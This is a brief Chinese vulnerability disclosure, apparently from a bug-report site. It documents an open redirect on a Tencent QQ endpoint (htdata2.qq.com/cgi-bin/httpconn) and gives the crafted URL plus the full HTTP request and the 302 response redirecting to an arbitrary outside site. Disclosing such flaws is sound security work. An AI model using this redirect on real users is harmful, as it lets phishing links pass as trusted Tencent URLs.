0x01 漏洞地址

http://htdata2.qq.com/cgi-bin/httpconn?htcmd=0x6ff0080&u=https://github.com/pmiaowu&wd=&eqid=c1558f51000079ee0000000555c103aa

0x02 跳转请求包

  1. # Request:
  2. GET http://htdata2.qq.com/cgi-bin/httpconn?htcmd=0x6ff0080&u=https://github.com/pmiaowu&wd=&eqid=c1558f51000079ee0000000555c103aa HTTP/1.1
  3. Host: htdata2.qq.com
  4. Connection: keep-alive
  5. Upgrade-Insecure-Requests: 1
  6. User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
  7. DNT: 1
  8. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  9. Accept-Encoding: gzip, deflate
  10. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
  11. Cookie: 不给你
  1. # Response:
  2. HTTP/1.1 302 Found
  3. Cache-Control: private
  4. Content-Type: text/html
  5. Server: QZHTTP-2.37.5
  6. Location: https://github.com/pmiaowu
  7. Content-Length: 26
  8. <html><body></body></html>